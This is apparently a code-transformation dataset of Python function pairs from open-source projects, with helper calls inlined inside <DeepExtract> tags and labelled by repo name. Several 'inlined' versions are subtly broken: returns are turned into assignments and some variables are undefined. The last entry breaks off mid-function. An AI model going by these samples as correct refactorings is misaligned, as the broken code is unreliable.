logger.error('Problem while reading the work order %s from wo-requests table', wo_id)
wo_process_result = None
logger.info('Validating JSON workorder request %s', wo_id)
if not self._validate_request(wo_id, wo_json_req):
wo_process_result = None
self._kv_helper.set('wo-worker-processing', self._identity, wo_id)
logger.info('Workorder %s picked up for processing by %s', wo_id, self._identity)
logger.info('Execute workorder with id %s', wo_id)
wo_json_resp = self._execute_work_order(wo_json_req)
wo_resp = json.loads(wo_json_resp)
logger.info('Update workorder receipt for workorder %s', wo_id)
self._wo_kv_delegate.update_receipt(wo_id, wo_resp)
if 'error' in wo_resp and wo_resp['error']['code'] == WorkOrderStatus.FAILED:
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.FAILED, wo_json_resp)
wo_process_result = None
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.SUCCESS, wo_json_resp)
wo_process_result = wo_resp
</DeepExtract>
self._kv_helper.remove('wo-worker-processing', self._identity)
return wo_process_result
else:
return None
logger.info('No more worker orders in wo-worker-scheduled table.')
|
def _process_work_order_sync(self, process_wo_id):
"""
Process the work-order of the specified work-order id
and return the response. Used for synchronous execution.
Parameters:
@param process_wo_id - Id of the work-order that is to be processed
"""
logger.info('About to process work orders found in wo-worker-scheduled table.')
wo_id = self._kv_helper.csv_match_pop('wo-worker-scheduled', self._worker_id, process_wo_id)
if process_wo_id == wo_id:
try:
wo_json_req = self._kv_helper.get('wo-requests', wo_id)
if wo_json_req is None:
logger.error('Received empty work order corresponding ' + 'to id %s from wo-requests table', wo_id)
wo_process_result = None
except Exception as e:
logger.error('Problem while reading the work order %s from wo-requests table', wo_id)
wo_process_result = None
logger.info('Validating JSON workorder request %s', wo_id)
if not self._validate_request(wo_id, wo_json_req):
wo_process_result = None
self._kv_helper.set('wo-worker-processing', self._identity, wo_id)
logger.info('Workorder %s picked up for processing by %s', wo_id, self._identity)
logger.info('Execute workorder with id %s', wo_id)
wo_json_resp = self._execute_work_order(wo_json_req)
wo_resp = json.loads(wo_json_resp)
logger.info('Update workorder receipt for workorder %s', wo_id)
self._wo_kv_delegate.update_receipt(wo_id, wo_resp)
if 'error' in wo_resp and wo_resp['error']['code'] == WorkOrderStatus.FAILED:
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.FAILED, wo_json_resp)
wo_process_result = None
self._persist_wo_response_to_db(wo_id, WorkOrderStatus.SUCCESS, wo_json_resp)
wo_process_result = wo_resp
self._kv_helper.remove('wo-worker-processing', self._identity)
return wo_process_result
else:
return None
logger.info('No more worker orders in wo-worker-scheduled table.')
|
avalon
|
positive
|
def _consume_to_next_section(self) -> List[str]:
<DeepExtract>
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and (not line):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
</DeepExtract>
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
|
def _consume_to_next_section(self) -> List[str]:
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and (not line):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
|
cotk
|
positive
|
def _make_noargs(self):
<DeepExtract>
idlflags = []
if self._isdual:
idlflags.append(dispid(self._m.memid))
idlflags.extend(self._m.idlflags)
else:
idlflags.extend(self._m.idlflags)
if __debug__ and self._m.doc:
idlflags.insert(1, helpstring(self._m.doc))
type_name = self._to_type_name(self._m.returns)
elms = (idlflags, type_name, self._m.name)
</DeepExtract>
code = " COMMETHOD(%r, %s, '%s')," % elms
if len(code) > 80:
code = " COMMETHOD(\n %r,\n %s,\n '%s',\n )," % elms
print(code, file=self._stream)
|
def _make_noargs(self):
idlflags = []
if self._isdual:
idlflags.append(dispid(self._m.memid))
idlflags.extend(self._m.idlflags)
else:
idlflags.extend(self._m.idlflags)
if __debug__ and self._m.doc:
idlflags.insert(1, helpstring(self._m.doc))
type_name = self._to_type_name(self._m.returns)
elms = (idlflags, type_name, self._m.name)
code = " COMMETHOD(%r, %s, '%s')," % elms
if len(code) > 80:
code = " COMMETHOD(\n %r,\n %s,\n '%s',\n )," % elms
print(code, file=self._stream)
|
comtypes
|
positive
|
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
<DeepExtract>
self.form_obj = self.view_form(**self.get_form_datas())
</DeepExtract>
<DeepExtract>
helper = self.get_form_helper()
if helper:
self.form_obj.helper = helper
</DeepExtract>
return self.get_response()
|
@csrf_protect_m
@filter_hook
def get(self, request, *args, **kwargs):
self.form_obj = self.view_form(**self.get_form_datas())
helper = self.get_form_helper()
if helper:
self.form_obj.helper = helper
return self.get_response()
|
devops
|
positive
|
def testAtrousFullyConvolutionalUnknownHeightWidth(self):
batch = 2
(height, width) = (65, 65)
global_pool = False
output_stride = 8
<DeepExtract>
if None in [batch, None, None, 3]:
inputs = tf.placeholder(tf.float32, (batch, None, None, 3))
else:
inputs = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(None), [None, 1]) + np.reshape(np.arange(None), [1, None]), [1, None, None, 1]), [batch, 1, 1, 3]))
</DeepExtract>
with slim.arg_scope(resnet_utils.resnet_arg_scope()):
<DeepExtract>
block = resnet_v1.resnet_v1_block
blocks = [block('block1', base_depth=1, num_units=3, stride=2), block('block2', base_depth=2, num_units=3, stride=2), block('block3', base_depth=4, num_units=3, stride=2), block('block4', base_depth=8, num_units=2, stride=1)]
(output, _) = resnet_v1.resnet_v1(inputs, blocks, None, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope)
</DeepExtract>
self.assertListEqual(output.get_shape().as_list(), [batch, None, None, 32])
<DeepExtract>
if None in [batch, height, width, 3]:
images = tf.placeholder(tf.float32, (batch, height, width, 3))
else:
images = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(height), [height, 1]) + np.reshape(np.arange(width), [1, width]), [1, height, width, 1]), [batch, 1, 1, 3]))
</DeepExtract>
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
output = sess.run(output, {inputs: images.eval()})
self.assertEqual(output.shape, (batch, 9, 9, 32))
|
def testAtrousFullyConvolutionalUnknownHeightWidth(self):
batch = 2
(height, width) = (65, 65)
global_pool = False
output_stride = 8
if None in [batch, None, None, 3]:
inputs = tf.placeholder(tf.float32, (batch, None, None, 3))
else:
inputs = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(None), [None, 1]) + np.reshape(np.arange(None), [1, None]), [1, None, None, 1]), [batch, 1, 1, 3]))
with slim.arg_scope(resnet_utils.resnet_arg_scope()):
block = resnet_v1.resnet_v1_block
blocks = [block('block1', base_depth=1, num_units=3, stride=2), block('block2', base_depth=2, num_units=3, stride=2), block('block3', base_depth=4, num_units=3, stride=2), block('block4', base_depth=8, num_units=2, stride=1)]
(output, _) = resnet_v1.resnet_v1(inputs, blocks, None, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope)
self.assertListEqual(output.get_shape().as_list(), [batch, None, None, 32])
if None in [batch, height, width, 3]:
images = tf.placeholder(tf.float32, (batch, height, width, 3))
else:
images = tf.to_float(np.tile(np.reshape(np.reshape(np.arange(height), [height, 1]) + np.reshape(np.arange(width), [1, width]), [1, height, width, 1]), [batch, 1, 1, 3]))
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
output = sess.run(output, {inputs: images.eval()})
self.assertEqual(output.shape, (batch, 9, 9, 32))
|
CVTron
|
positive
|
def terminate_job(self, pid, sig=None):
<DeepExtract>
(proc, _) = next(((proc, i) for (i, proc) in enumerate(self.processes) if proc.pid == pid), (None, None))
</DeepExtract>
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
|
def terminate_job(self, pid, sig=None):
(proc, _) = next(((proc, i) for (i, proc) in enumerate(self.processes) if proc.pid == pid), (None, None))
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
|
billiard
|
positive
|
def test_close(self):
s = self.SELECTOR()
self.addCleanup(s.close)
<DeepExtract>
(rd, wr) = socketpair()
self.addCleanup(rd.close)
self.addCleanup(wr.close)
(rd, wr) = (rd, wr)
</DeepExtract>
s.register(rd, EVENT_READ)
s.register(wr, EVENT_WRITE)
s.close()
self.assertRaises(KeyError, s.get_key, rd)
self.assertRaises(KeyError, s.get_key, wr)
|
def test_close(self):
s = self.SELECTOR()
self.addCleanup(s.close)
(rd, wr) = socketpair()
self.addCleanup(rd.close)
self.addCleanup(wr.close)
(rd, wr) = (rd, wr)
s.register(rd, EVENT_READ)
s.register(wr, EVENT_WRITE)
s.close()
self.assertRaises(KeyError, s.get_key, rd)
self.assertRaises(KeyError, s.get_key, wr)
|
aiozmq
|
positive
|
def searchPath(self, start, end, path=[]):
path = path + [start]
if start == end:
return path
if start not in self.d:
return None
for node in self.d[start]:
if node not in path:
<DeepExtract>
path = path + [node]
if node == end:
newpath = path
if node not in self.d:
newpath = None
for node in self.d[node]:
if node not in path:
newpath = self.searchPath(node, end, path)
if newpath:
newpath = newpath
newpath = None
</DeepExtract>
if newpath:
return newpath
return None
|
def searchPath(self, start, end, path=[]):
path = path + [start]
if start == end:
return path
if start not in self.d:
return None
for node in self.d[start]:
if node not in path:
path = path + [node]
if node == end:
newpath = path
if node not in self.d:
newpath = None
for node in self.d[node]:
if node not in path:
newpath = self.searchPath(node, end, path)
if newpath:
newpath = newpath
newpath = None
if newpath:
return newpath
return None
|
cosa-nostra
|
positive
|
def get_species_files(self, species, outdir):
<DeepExtract>
species_dict = {x.text.rstrip(): x for x in self.xml_tree.getroot().findall('species')}
if species not in species_dict:
raise Error('Error! Species "' + species + '" not found. Cannot continue. Available species:\n' + '\n'.join(sorted(list(species_dict.keys()))))
try:
profile_url = species_dict[species].find('mlst').find('database').find('profiles').find('url').text
except:
raise Error('Error getting profile url for species ' + species + '. Cannot continue')
locus_list = species_dict[species].find('mlst').find('database').find('loci').findall('locus')
fasta_urls = [x.find('url').text for x in locus_list]
if len(fasta_urls) == 0:
raise Error('Error! No fasta files found for species ' + species + '. Cannot continue')
(profile_url, fasta_urls) = (profile_url, fasta_urls)
</DeepExtract>
<DeepExtract>
try:
os.mkdir(outdir)
except:
raise Error('Error mkdir ' + outdir)
profile_outfile = os.path.join(outdir, 'profile.txt')
self._download_file(profile_url, profile_outfile)
for fasta_url in fasta_urls:
outfile = '{0}.tfa'.format(os.path.join(outdir, fasta_url.split('/')[-2]))
self._download_file(fasta_url, outfile + '.tmp')
PubmlstGetter._rename_seqs_in_fasta(outfile + '.tmp', outfile)
os.unlink(outfile + '.tmp')
</DeepExtract>
|
def get_species_files(self, species, outdir):
species_dict = {x.text.rstrip(): x for x in self.xml_tree.getroot().findall('species')}
if species not in species_dict:
raise Error('Error! Species "' + species + '" not found. Cannot continue. Available species:\n' + '\n'.join(sorted(list(species_dict.keys()))))
try:
profile_url = species_dict[species].find('mlst').find('database').find('profiles').find('url').text
except:
raise Error('Error getting profile url for species ' + species + '. Cannot continue')
locus_list = species_dict[species].find('mlst').find('database').find('loci').findall('locus')
fasta_urls = [x.find('url').text for x in locus_list]
if len(fasta_urls) == 0:
raise Error('Error! No fasta files found for species ' + species + '. Cannot continue')
(profile_url, fasta_urls) = (profile_url, fasta_urls)
try:
os.mkdir(outdir)
except:
raise Error('Error mkdir ' + outdir)
profile_outfile = os.path.join(outdir, 'profile.txt')
self._download_file(profile_url, profile_outfile)
for fasta_url in fasta_urls:
outfile = '{0}.tfa'.format(os.path.join(outdir, fasta_url.split('/')[-2]))
self._download_file(fasta_url, outfile + '.tmp')
PubmlstGetter._rename_seqs_in_fasta(outfile + '.tmp', outfile)
os.unlink(outfile + '.tmp')
</DeepExtract>
|
ariba
|
positive
|
def init_optimizer(self, kvstore='local', optimizer='sgd', optimizer_params=(('learning_rate', 0.01),), force_init=False):
"""Install and initialize optimizers.
Parameters
----------
kvstore : str or KVStore
Default `'local'`.
optimizer : str or Optimizer
Default `'sgd'`
optimizer_params : dict
Default `(('learning_rate', 0.01),)`. The default value is not a dictionary,
just to avoid pylint warning of dangerous default values.
force_init : bool
Default `False`, indicating whether we should force re-initializing the
optimizer in the case an optimizer is already installed.
"""
assert self.binded and self.params_initialized
if self.optimizer_initialized and (not force_init):
self.logger.warning('optimizer already initialized, ignoring...')
return
(kvstore, update_on_kvstore) = _create_kvstore(kvstore, len(self._context), self._arg_params)
batch_size = self._exec_group.batch_size
if kvstore and 'dist' in kvstore.type and ('_sync' in kvstore.type):
batch_size *= kvstore.num_workers
rescale_grad = 1.0 / batch_size
if isinstance(optimizer, str):
idx2name = {}
if update_on_kvstore:
idx2name.update(enumerate(self._exec_group.param_names))
else:
for k in range(len(self._context)):
idx2name.update({i * len(self._context) + k: n for (i, n) in enumerate(self._exec_group.param_names)})
optimizer_params = dict(optimizer_params)
if 'rescale_grad' not in optimizer_params:
optimizer_params['rescale_grad'] = rescale_grad
optimizer = opt.create(optimizer, sym=self.symbol, param_idx2name=idx2name, **optimizer_params)
else:
assert isinstance(optimizer, opt.Optimizer)
if optimizer.rescale_grad != rescale_grad:
warnings.warn('Optimizer created manually outside Module but rescale_grad ' + 'is not normalized to 1.0/batch_size/num_workers (%s vs. %s). ' % (optimizer.rescale_grad, rescale_grad) + 'Is this intended?', stacklevel=2)
self._optimizer = optimizer
self._kvstore = kvstore
self._update_on_kvstore = update_on_kvstore
self._updater = None
if kvstore:
_initialize_kvstore(kvstore=kvstore, param_arrays=self._exec_group.param_arrays, arg_params=self._arg_params, param_names=self._param_names, update_on_kvstore=update_on_kvstore)
if update_on_kvstore:
kvstore.set_optimizer(self._optimizer)
else:
self._updater = opt.get_updater(optimizer)
self.optimizer_initialized = True
if self._preload_opt_states is not None:
<DeepExtract>
assert self.optimizer_initialized
if self._update_on_kvstore:
self._kvstore.load_optimizer_states(self._preload_opt_states)
else:
self._updater.set_states(open(self._preload_opt_states, 'rb').read())
</DeepExtract>
self._preload_opt_states = None
|
def init_optimizer(self, kvstore='local', optimizer='sgd', optimizer_params=(('learning_rate', 0.01),), force_init=False):
"""Install and initialize optimizers.
Parameters
----------
kvstore : str or KVStore
Default `'local'`.
optimizer : str or Optimizer
Default `'sgd'`
optimizer_params : dict
Default `(('learning_rate', 0.01),)`. The default value is not a dictionary,
just to avoid pylint warning of dangerous default values.
force_init : bool
Default `False`, indicating whether we should force re-initializing the
optimizer in the case an optimizer is already installed.
"""
assert self.binded and self.params_initialized
if self.optimizer_initialized and (not force_init):
self.logger.warning('optimizer already initialized, ignoring...')
return
(kvstore, update_on_kvstore) = _create_kvstore(kvstore, len(self._context), self._arg_params)
batch_size = self._exec_group.batch_size
if kvstore and 'dist' in kvstore.type and ('_sync' in kvstore.type):
batch_size *= kvstore.num_workers
rescale_grad = 1.0 / batch_size
if isinstance(optimizer, str):
idx2name = {}
if update_on_kvstore:
idx2name.update(enumerate(self._exec_group.param_names))
else:
for k in range(len(self._context)):
idx2name.update({i * len(self._context) + k: n for (i, n) in enumerate(self._exec_group.param_names)})
optimizer_params = dict(optimizer_params)
if 'rescale_grad' not in optimizer_params:
optimizer_params['rescale_grad'] = rescale_grad
optimizer = opt.create(optimizer, sym=self.symbol, param_idx2name=idx2name, **optimizer_params)
else:
assert isinstance(optimizer, opt.Optimizer)
if optimizer.rescale_grad != rescale_grad:
warnings.warn('Optimizer created manually outside Module but rescale_grad ' + 'is not normalized to 1.0/batch_size/num_workers (%s vs. %s). ' % (optimizer.rescale_grad, rescale_grad) + 'Is this intended?', stacklevel=2)
self._optimizer = optimizer
self._kvstore = kvstore
self._update_on_kvstore = update_on_kvstore
self._updater = None
if kvstore:
_initialize_kvstore(kvstore=kvstore, param_arrays=self._exec_group.param_arrays, arg_params=self._arg_params, param_names=self._param_names, update_on_kvstore=update_on_kvstore)
if update_on_kvstore:
kvstore.set_optimizer(self._optimizer)
else:
self._updater = opt.get_updater(optimizer)
self.optimizer_initialized = True
if self._preload_opt_states is not None:
assert self.optimizer_initialized
if self._update_on_kvstore:
self._kvstore.load_optimizer_states(self._preload_opt_states)
else:
self._updater.set_states(open(self._preload_opt_states, 'rb').read())
self._preload_opt_states = None
|
Deformable-ConvNets
|
positive
|
def get_mask(path):
if type(path) != str:
mask = np.zeros(IMAGE_SIZE)
else:
<DeepExtract>
with rasterio.open(path) as src:
img = src.read().transpose((1, 2, 0))
seg = np.array(img, dtype=int)
mask = seg[:, :, 0]
</DeepExtract>
return np.array(mask, dtype=np.uint8)
|
def get_mask(path):
if type(path) != str:
mask = np.zeros(IMAGE_SIZE)
else:
with rasterio.open(path) as src:
img = src.read().transpose((1, 2, 0))
seg = np.array(img, dtype=int)
mask = seg[:, :, 0]
return np.array(mask, dtype=np.uint8)
|
activefire
|
positive
|
def _threshold_and_support(input, dim=0):
"""Sparsemax building block: compute the threshold
Args:
input: any dimension
dim: dimension along which to apply the sparsemax
Returns:
the threshold value
"""
(input_srt, _) = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
<DeepExtract>
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
rhos = rho.view(view).transpose(0, dim)
</DeepExtract>
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return (tau, support_size)
|
def _threshold_and_support(input, dim=0):
"""Sparsemax building block: compute the threshold
Args:
input: any dimension
dim: dimension along which to apply the sparsemax
Returns:
the threshold value
"""
(input_srt, _) = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
rhos = rho.view(view).transpose(0, dim)
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return (tau, support_size)
|
encoder-agnostic-adaptation
|
positive
|
def run_search(target_parameter_count, create_model_func: Callable[[int], nn.Module], lower: int, upper: int):
if lower == upper:
return lower
mid = int(math.floor((lower + upper) / 2))
<DeepExtract>
mid_count = sum((p.numel() for p in create_model_func(mid).parameters() if p.requires_grad))
</DeepExtract>
if mid_count == target_parameter_count:
return mid
elif mid_count > target_parameter_count:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=lower, upper=mid)
else:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=mid + 1, upper=upper)
|
def run_search(target_parameter_count, create_model_func: Callable[[int], nn.Module], lower: int, upper: int):
if lower == upper:
return lower
mid = int(math.floor((lower + upper) / 2))
mid_count = sum((p.numel() for p in create_model_func(mid).parameters() if p.requires_grad))
if mid_count == target_parameter_count:
return mid
elif mid_count > target_parameter_count:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=lower, upper=mid)
else:
return run_search(target_parameter_count=target_parameter_count, create_model_func=create_model_func, lower=mid + 1, upper=upper)
|
cordial-sync
|
positive
|
def train_joint():
nlg_loss = nlu_loss = 0
nlg_loss_gen = nlu_loss_gen = 0
batch_amount = 0
nlu_scorer = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlu_scorer_gen = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlg_scorer = SequenceScorer()
nlg_scorer_gen = SequenceScorer()
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer)
pbar = tqdm(zip(self.train_nlg_data_loader, self.train_nlu_data_loader), total=len(self.train_nlg_data_loader), dynamic_ncols=True)
for (batch_nlg, batch_nlu) in pbar:
<DeepExtract>
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer_gen)
(encoder_input, decoder_label, refs, sf_data) = batch_nlg
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, nlg_joint_prob, last_reward) = self.run_nlg_batch(batch_nlg, criterion_nlg, scorer=nlg_scorer, testing=False, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, retain_graph=True, optimize=False, beam_size=mid_sample_size, nlg_st=nlg_st, supervised=primal_supervised, reinforce=primal_reinforce)
generated_batch = [batch_decode_result, encoder_input, refs, sf_data]
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, _, _, _) = self.run_nlu_batch_dual(generated_batch, criterion_nlu, scorer=nlu_scorer_gen, joint_prob_other=nlg_joint_prob if mid_sample_size > 1 else None, max_norm=max_norm, last_reward=last_reward, sample_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
</DeepExtract>
nlg_loss += batch_loss_nlg
nlu_loss_gen += batch_loss_nlu
<DeepExtract>
criterion_nlg.set_scorer(nlg_scorer_gen)
criterion_nlu.set_scorer(nlu_scorer)
(encoder_input, decoder_label, refs, sf_data) = batch_nlu
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, samples, nlu_joint_prob, last_reward) = self.run_nlu_batch(batch_nlu, criterion_nlu, scorer=nlu_scorer, testing=False, max_norm=max_norm, retain_graph=True, optimize=False, sample_size=mid_sample_size, supervised=primal_supervised, reinforce=primal_reinforce)
if nlu_st:
generated_batch = [samples, encoder_input, refs, sf_data]
else:
generated_batch = [self._st_sigmoid(batch_logits, hard=False).unsqueeze(1).expand(-1, mid_sample_size, -1), encoder_input, refs, sf_data]
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, _, _) = self.run_nlg_batch_dual(generated_batch, criterion_nlg, scorer=nlg_scorer_gen, joint_prob_other=nlu_joint_prob if mid_sample_size > 1 else None, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, last_reward=last_reward, beam_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
</DeepExtract>
nlg_loss_gen += batch_loss_nlg
nlu_loss += batch_loss_nlu
batch_amount += 1
pbar.set_postfix(UT='{:.4f}'.format(nlu_loss / batch_amount), UF='{:.4f}'.format(nlu_loss_gen / batch_amount), GT='{:.3f}'.format(nlg_loss / batch_amount), GF='{:.3f}'.format(nlg_loss_gen / batch_amount))
print_time_info('True NLG scores:')
nlg_scorer.print_avg_scores()
print_time_info('Generated NLG scores:')
nlg_scorer_gen.print_avg_scores()
print_time_info('True NLU scores:')
nlu_scorer.print_avg_scores()
print_time_info('Generated NLU scores:')
nlu_scorer_gen.print_avg_scores()
return (nlg_loss / batch_amount, nlg_loss_gen / batch_amount, nlu_loss / batch_amount, nlu_loss_gen / batch_amount, nlg_scorer, nlg_scorer_gen, nlu_scorer, nlu_scorer_gen)
|
def train_joint():
nlg_loss = nlu_loss = 0
nlg_loss_gen = nlu_loss_gen = 0
batch_amount = 0
nlu_scorer = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlu_scorer_gen = MultilabelScorer(f1_per_sample=self.f1_per_sample)
nlg_scorer = SequenceScorer()
nlg_scorer_gen = SequenceScorer()
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer)
pbar = tqdm(zip(self.train_nlg_data_loader, self.train_nlu_data_loader), total=len(self.train_nlg_data_loader), dynamic_ncols=True)
for (batch_nlg, batch_nlu) in pbar:
criterion_nlg.set_scorer(nlg_scorer)
criterion_nlu.set_scorer(nlu_scorer_gen)
(encoder_input, decoder_label, refs, sf_data) = batch_nlg
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, nlg_joint_prob, last_reward) = self.run_nlg_batch(batch_nlg, criterion_nlg, scorer=nlg_scorer, testing=False, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, retain_graph=True, optimize=False, beam_size=mid_sample_size, nlg_st=nlg_st, supervised=primal_supervised, reinforce=primal_reinforce)
generated_batch = [batch_decode_result, encoder_input, refs, sf_data]
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, _, _, _) = self.run_nlu_batch_dual(generated_batch, criterion_nlu, scorer=nlu_scorer_gen, joint_prob_other=nlg_joint_prob if mid_sample_size > 1 else None, max_norm=max_norm, last_reward=last_reward, sample_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
nlg_loss += batch_loss_nlg
nlu_loss_gen += batch_loss_nlu
criterion_nlg.set_scorer(nlg_scorer_gen)
criterion_nlu.set_scorer(nlu_scorer)
(encoder_input, decoder_label, refs, sf_data) = batch_nlu
self.nlu_batches += 1
(batch_loss_nlu, batch_logits, samples, nlu_joint_prob, last_reward) = self.run_nlu_batch(batch_nlu, criterion_nlu, scorer=nlu_scorer, testing=False, max_norm=max_norm, retain_graph=True, optimize=False, sample_size=mid_sample_size, supervised=primal_supervised, reinforce=primal_reinforce)
if nlu_st:
generated_batch = [samples, encoder_input, refs, sf_data]
else:
generated_batch = [self._st_sigmoid(batch_logits, hard=False).unsqueeze(1).expand(-1, mid_sample_size, -1), encoder_input, refs, sf_data]
self.nlg_batches += 1
(batch_loss_nlg, batch_logits, batch_decode_result, _, _) = self.run_nlg_batch_dual(generated_batch, criterion_nlg, scorer=nlg_scorer_gen, joint_prob_other=nlu_joint_prob if mid_sample_size > 1 else None, teacher_forcing_ratio=teacher_forcing_ratio, max_norm=max_norm, last_reward=last_reward, beam_size=dual_sample_size, supervised=dual_supervised, reinforce=dual_reinforce)
(batch_loss_nlg, batch_loss_nlu) = (batch_loss_nlg.item(), batch_loss_nlu.item())
nlg_loss_gen += batch_loss_nlg
nlu_loss += batch_loss_nlu
batch_amount += 1
pbar.set_postfix(UT='{:.4f}'.format(nlu_loss / batch_amount), UF='{:.4f}'.format(nlu_loss_gen / batch_amount), GT='{:.3f}'.format(nlg_loss / batch_amount), GF='{:.3f}'.format(nlg_loss_gen / batch_amount))
print_time_info('True NLG scores:')
nlg_scorer.print_avg_scores()
print_time_info('Generated NLG scores:')
nlg_scorer_gen.print_avg_scores()
print_time_info('True NLU scores:')
nlu_scorer.print_avg_scores()
print_time_info('Generated NLU scores:')
nlu_scorer_gen.print_avg_scores()
return (nlg_loss / batch_amount, nlg_loss_gen / batch_amount, nlu_loss / batch_amount, nlu_loss_gen / batch_amount, nlg_scorer, nlg_scorer_gen, nlu_scorer, nlu_scorer_gen)
|
DuaLUG
|
positive
|
def link_devel_products(logger, event_queue, package, package_path, devel_manifest_path, source_devel_path, dest_devel_path, metadata_path, prebuild):
"""Link files from an isolated devel space into a merged one.
This creates directories and symlinks in a merged devel space to a
package's linked devel space.
"""
mkdir_p(devel_manifest_path)
devel_manifest_file_path = os.path.join(devel_manifest_path, DEVEL_MANIFEST_FILENAME)
products = list()
files_to_clean = []
files_that_collide = []
skiplist = DEVEL_LINK_PREBUILD_SKIPLIST if prebuild else DEVEL_LINK_SKIPLIST
def should_skip_file(filename):
if os.path.relpath(os.path.join(source_path, filename), source_devel_path) in skiplist:
return True
for directory in os.path.relpath(os.path.join(source_path, filename), source_devel_path).split(os.path.sep):
if directory in DEVEL_LINK_SKIP_DIRECTORIES:
return True
return False
for (source_path, dirs, files) in os.walk(source_devel_path):
dest_path = os.path.join(dest_devel_path, os.path.relpath(source_path, source_devel_path))
for dirname in dirs:
if dirname in DEVEL_LINK_SKIP_DIRECTORIES:
continue
source_dir = os.path.join(source_path, dirname)
dest_dir = os.path.join(dest_path, dirname)
if os.path.islink(source_dir):
products.append((source_dir, dest_dir))
if os.path.exists(dest_dir):
if os.path.realpath(dest_dir) != os.path.realpath(source_dir):
files_that_collide.append(dest_dir)
else:
logger.out('Linked: ({}, {})'.format(source_dir, dest_dir))
else:
logger.out('Symlinking %s' % dest_dir)
try:
os.symlink(source_dir, dest_dir)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_dir, source_dir))
raise
elif not os.path.exists(dest_dir):
os.mkdir(dest_dir)
elif not os.path.isdir(dest_dir):
logger.err('Error: Cannot create directory: {}'.format(dest_dir))
return -1
for filename in files:
if should_skip_file(filename):
continue
source_file = os.path.join(source_path, filename)
dest_file = os.path.join(dest_path, filename)
products.append((source_file, dest_file))
if os.path.exists(dest_file):
if os.path.realpath(dest_file) != os.path.realpath(source_file):
source_hash = md5(open(os.path.realpath(source_file), 'rb').read()).hexdigest()
dest_hash = md5(open(os.path.realpath(dest_file), 'rb').read()).hexdigest()
if dest_hash != source_hash:
logger.err('Warning: Cannot symlink from %s to existing file %s' % (source_file, dest_file))
logger.err('Warning: Source hash: {}'.format(source_hash))
logger.err('Warning: Dest hash: {}'.format(dest_hash))
files_that_collide.append(dest_file)
else:
logger.out('Linked: ({}, {})'.format(source_file, dest_file))
else:
logger.out('Symlinking %s' % dest_file)
try:
os.symlink(source_file, dest_file)
except OSError:
logger.err('Could not create symlink `{}` referencing `{}`'.format(dest_file, source_file))
raise
if os.path.exists(devel_manifest_file_path):
with open(devel_manifest_file_path, 'r') as devel_manifest:
manifest_reader = csv.reader(devel_manifest, delimiter=' ', quotechar='"')
devel_manifest.readline()
for (source_file, dest_file) in manifest_reader:
if (source_file, dest_file) not in products:
logger.out('Cleaning: (%s, %s)' % (source_file, dest_file))
files_to_clean.append(dest_file)
try:
<DeepExtract>
